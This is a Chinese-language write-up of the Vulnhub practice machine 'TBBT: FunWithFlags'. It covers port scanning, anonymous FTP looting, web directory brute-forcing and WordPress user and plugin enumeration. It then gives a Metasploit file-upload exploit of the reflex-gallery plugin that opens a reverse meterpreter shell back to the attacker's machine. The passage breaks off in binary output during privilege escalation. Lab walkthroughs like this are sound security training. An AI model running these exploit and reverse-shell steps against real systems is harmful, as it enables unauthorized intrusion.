TBBT FunWithFlags
作者:jason_huawen
靶机基本信息
名称:TBBT: FunWithFlags
地址:
https://www.vulnhub.com/entry/tbbt-funwithflags,437/
其他说明:靶机配置静态IP地址,因此Kali Linux的网卡需要配置成同一网段的地址
NMAP扫描
利用NMAP工具对目标主机进行全端口扫描:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ sudo nmap -sS -sV -sC -p- 192.168.1.105 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-11 20:27 EST
Nmap scan report for bogon (192.168.1.105)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 2020 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 2020 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.200
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-title: Fun with flags!
|_http-server-header: Apache/2.4.18 (Ubuntu)
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.92%I=7%D=12/11%Time=63968391%P=x86_64-pc-linux-gnu%r(N
SF:ULL,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GenericLin
SF:es,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GetRequest,
SF:2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(HTTPOptions,2F
SF:,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(RTSPRequest,2F,"
SF:FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(RPCCheck,2F,"FLAG-
SF:sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(DNSVersionBindReqTCP,2F
SF:,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(DNSStatusRequest
SF:TCP,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(Help,2F,"F
SF:LAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(SSLSessionReq,2F,"F
SF:LAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(TerminalServerCooki
SF:e,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(TLSSessionRe
SF:q,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(Kerberos,2F,
SF:"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(SMBProgNeg,2F,"FL
SF:AG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(X11Probe,2F,"FLAG-sh
SF:eldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(FourOhFourRequest,2F,"FLA
SF:G-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(LPDString,2F,"FLAG-sh
SF:eldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(LDAPSearchReq,2F,"FLAG-sh
SF:eldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(LDAPBindReq,2F,"FLAG-shel
SF:don{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(SIPOptions,2F,"FLAG-sheldon
SF:{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(LANDesk-RC,2F,"FLAG-sheldon{cf
SF:88b37e8cb10c4005c1f2781a069cf8}\n")%r(TerminalServer,2F,"FLAG-sheldon{c
SF:f88b37e8cb10c4005c1f2781a069cf8}\n")%r(NCP,2F,"FLAG-sheldon{cf88b37e8cb
SF:10c4005c1f2781a069cf8}\n")%r(NotesRPC,2F,"FLAG-sheldon{cf88b37e8cb10c40
SF:05c1f2781a069cf8}\n")%r(JavaRMI,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2
SF:781a069cf8}\n")%r(WMSRequest,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781
SF:a069cf8}\n")%r(oracle-tns,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a06
SF:9cf8}\n")%r(ms-sql-s,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
SF:\n")%r(afp,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(gio
SF:p,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n");
MAC Address: 08:00:27:67:0D:48 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、1337(?)
获得Shell
先从FTP服务开始信息的收集和分析,
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp> ls
229 Entering Extended Passive Mode (|||45119|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 539 Mar 04 2020 Welcome.txt
-rw-r--r-- 1 ftp ftp 114 Mar 04 2020 ftp_agreement.txt
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 pub
226 Directory send OK.
ftp> get Welcome.txt
local: Welcome.txt remote: Welcome.txt
229 Entering Extended Passive Mode (|||44749|)
150 Opening BINARY mode data connection for Welcome.txt (539 bytes).
100% |********************************************************************************| 539 1.00 MiB/s 00:00 ETA
226 Transfer complete.
539 bytes received in 00:00 (532.22 KiB/s)
ftp> get ftp_agreement.txt
local: ftp_agreement.txt remote: ftp_agreement.txt
229 Entering Extended Passive Mode (|||46655|)
150 Opening BINARY mode data connection for ftp_agreement.txt (114 bytes).
100% |********************************************************************************| 114 238.90 KiB/s 00:00 ETA
226 Transfer complete.
114 bytes received in 00:00 (126.36 KiB/s)
ftp> cd pub
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49507|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||42238|)
150 Here comes the directory listing.
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 3 ftp ftp 4096 Mar 04 2020 ..
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd amy
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40923|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> cd bernadette
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||44833|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 340 Mar 04 2020 PENNY_README_ASAP.txt
226 Directory send OK.
ftp> get PENNY_README_ASAP.txt
local: PENNY_README_ASAP.txt remote: PENNY_README_ASAP.txt
229 Entering Extended Passive Mode (|||47232|)
150 Opening BINARY mode data connection for PENNY_README_ASAP.txt (340 bytes).
100% |********************************************************************************| 340 709.46 KiB/s 00:00 ETA
226 Transfer complete.
340 bytes received in 00:00 (368.51 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||40488|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd howard
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||49126|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 273 Mar 04 2020 note.txt
-rw-r--r-- 1 ftp ftp 30762 Mar 06 2020 super_secret_nasa_stuff_here.zip
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||40129|)
150 Opening BINARY mode data connection for note.txt (273 bytes).
100% |********************************************************************************| 273 539.67 KiB/s 00:00 ETA
226 Transfer complete.
273 bytes received in 00:00 (254.63 KiB/s)
ftp> get super_secret_nasa_stuff_here.zip
local: super_secret_nasa_stuff_here.zip remote: super_secret_nasa_stuff_here.zip
229 Entering Extended Passive Mode (|||48503|)
150 Opening BINARY mode data connection for super_secret_nasa_stuff_here.zip (30762 bytes).
100% |********************************************************************************| 30762 28.15 MiB/s 00:00 ETA
226 Transfer complete.
30762 bytes received in 00:00 (20.82 MiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||48065|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd leonard
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||45378|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> cd penny
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||48884|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
-rw-r--r-- 1 ftp ftp 89 Mar 05 2020 todolist.txt
-rw-r--r-- 1 ftp ftp 113 Mar 04 2020 wifi_password.txt
226 Directory send OK.
ftp> get todolist.txt
local: todolist.txt remote: todolist.txt
229 Entering Extended Passive Mode (|||42981|)
150 Opening BINARY mode data connection for todolist.txt (89 bytes).
100% |********************************************************************************| 89 175.93 KiB/s 00:00 ETA
226 Transfer complete.
89 bytes received in 00:00 (100.24 KiB/s)
ftp> get wifi_password.txt
local: wifi_password.txt remote: wifi_password.txt
229 Entering Extended Passive Mode (|||43493|)
150 Opening BINARY mode data connection for wifi_password.txt (113 bytes).
100% |********************************************************************************| 113 257.83 KiB/s 00:00 ETA
226 Transfer complete.
113 bytes received in 00:00 (123.71 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||47753|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> cd r
raj roomate_agreement.jpg roomate_agreement.txt
ftp> cd raj
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49175|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||46798|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45711|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 2020 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 2020 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 2020 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 2020 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 2020 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 sheldon
226 Directory send OK.
ftp> get roomate_agreement.jpg
local: roomate_agreement.jpg remote: roomate_agreement.jpg
229 Entering Extended Passive Mode (|||48710|)
150 Opening BINARY mode data connection for roomate_agreement.jpg (297410 bytes).
100% |********************************************************************************| 290 KiB 79.96 MiB/s 00:00 ETA
226 Transfer complete.
297410 bytes received in 00:00 (71.66 MiB/s)
ftp> get r
raj roomate_agreement.jpg roomate_agreement.txt
ftp> get roomate_agreement.txt
local: roomate_agreement.txt remote: roomate_agreement.txt
229 Entering Extended Passive Mode (|||47294|)
150 Opening BINARY mode data connection for roomate_agreement.txt (3348 bytes).
100% |********************************************************************************| 3348 7.39 MiB/s 00:00 ETA
226 Transfer complete.
3348 bytes received in 00:00 (3.73 MiB/s)
ftp> cd sheldon
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42478|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40997|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 04 2020 .
drwxr-xr-x 9 ftp ftp 4096 Mar 04 2020 ..
226 Directory send OK.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ls
ftp_agreement.txt note.txt roomate_agreement.jpg super_secret_nasa_stuff_here.zip Welcome.txt
nmap_full_scan PENNY_README_ASAP.txt roomate_agreement.txt todolist.txt wifi_password.txt
目标主机FTP上有不少的文件,将其下载到Kali Linux本地,但是一时间没有相应的突破,john工具破解密码似乎有问题:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ ls
ftp_agreement.txt nmap_full_scan PENNY_README_ASAP.txt roomate_agreement.txt todolist.txt wifi_password.txt
hashes note.txt roomate_agreement.jpg super_secret_nasa_stuff_here.zip Welcome.txt
再来看80端口:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ curl http://192.168.1.105/robots.txt
User-Agent: *
Disallow:
Disallow: /howard
Disallow: /web_shell.php
Disallow: /backdoor
Disallow: /rootflag.txt
访问/web_shell.php, /backdoor, /rootflag.txt,返回要么是不存在,要么是没有内容,也许是作者留下的陷阱。还是扫描一下有无其他可利用的目录或者文件:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.105
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/11 21:07:30 Starting gobuster in directory enumeration mode
===============================================================
/music (Status: 301) [Size: 314] [--> http://192.168.1.105/music/]
/private (Status: 301) [Size: 316] [--> http://192.168.1.105/private/]
/javascript (Status: 301) [Size: 319] [--> http://192.168.1.105/javascript/]
/phpmyadmin (Status: 301) [Size: 319] [--> http://192.168.1.105/phpmyadmin/]
/howard (Status: 301) [Size: 315] [--> http://192.168.1.105/howard/]
/server-status (Status: 403) [Size: 301]
Progress: 218851 / 220561 (99.22%)===============================================================
2022/12/11 21:08:01 Finished
继续用dirb工具扫描目标主机目录:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Dec 11 21:08:09 2022
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.1.105/javascript/ ----
==> DIRECTORY: http://192.168.1.105/javascript/jquery/
---- Entering directory: http://192.168.1.105/music/ ----
+ http://192.168.1.105/music/index.html (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/
dirb工具发现了目标主机存在wordpress站点,利用wpscan工具进行扫描:
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ wpscan --url http://192.168.1.105/music/wordpress/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.1.105/music/wordpress/ [192.168.1.105]
[+] Started: Sun Dec 11 21:10:09 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.1.105/music/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.1.105/music/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Registration is enabled: http://192.168.1.105/music/wordpress/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.1.105/music/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.1.105/music/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.105/music/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.1.105/music/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] reflex-gallery
| Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2021-03-10T02:38:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] footprintsonthemoon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] stuart
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] kripke
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Dec 11 21:10:12 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.633 KB
[+] Data Received: 528.084 KB
[+] Memory used: 239.219 MB
[+] Elapsed time: 00:00:03
识别出用户,并且识别出目标站点存在有漏洞的插件:reflex-gallery,利用metasploit中模块进行漏洞利用:
msf6 > search reflex
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_reflexgallery_file_upload
msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options
Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Reflex Gallery 3.1.3
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.105
RHOSTS => 192.168.1.105
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /music/wordpress
TARGETURI => /music/wordpress
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.200
LHOST => 192.168.1.200
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.1.200:5555
[+] Our payload is at: YaESnrXVH.php. Calling payload...
[*] Calling payload...
[*] Sending stage (39927 bytes) to 192.168.1.105
[+] Deleted YaESnrXVH.php
[*] Meterpreter session 1 opened (192.168.1.200:5555 -> 192.168.1.105:44850) at 2022-12-11 21:15:00 -0500
id
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 2321 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads/2022/12$ cd /home
</music/wordpress/wp-content/uploads/2022/12$ cd /home
www-data@tbbt:/home$ ls -alh
ls -alh
total 40K
drwxr-xr-x 10 root root 4.0K Mar 4 2020 .
drwxr-xr-x 22 root root 4.0K Mar 3 2020 ..
drwxr-xr-x 4 amy amy 4.0K Mar 6 2020 amy
drwxr-xr-x 2 bernadette bernadette 4.0K Mar 6 2020 bernadette
drwxr-xr-x 4 funwithflags funwithflags 4.0K Mar 6 2020 funwithflags
drwxr-xr-x 3 howard howard 4.0K Mar 6 2020 howard
drwxr-xr-x 2 leonard leonard 4.0K Mar 6 2020 leonard
drwxr-xr-x 4 penny penny 4.0K Mar 6 2020 penny
drwxr-xr-x 2 raj raj 4.0K Mar 4 2020 raj
drwxr-xr-x 3 sheldon sheldon 4.0K Mar 4 2020 sheldon
www-data@tbbt:/home$
提权
www-data@tbbt:/home/amy$ cat secretdiary
cat secretdiary
ELF�4h▒4 (444 $��hhhDDP�tdppp,,Q�tdR��/lib/ld-linux.so.2GNU GNUX����H���:�E@y|� �K��?.)X F▒
|libc.so.6_IO_stdin_used_{��oc99_scanfputs__stack_chk_failstrcmp__libc_start_main__gmon_start__GLIBC_2.7GLIBC_2.4GLIBC_2.0ii
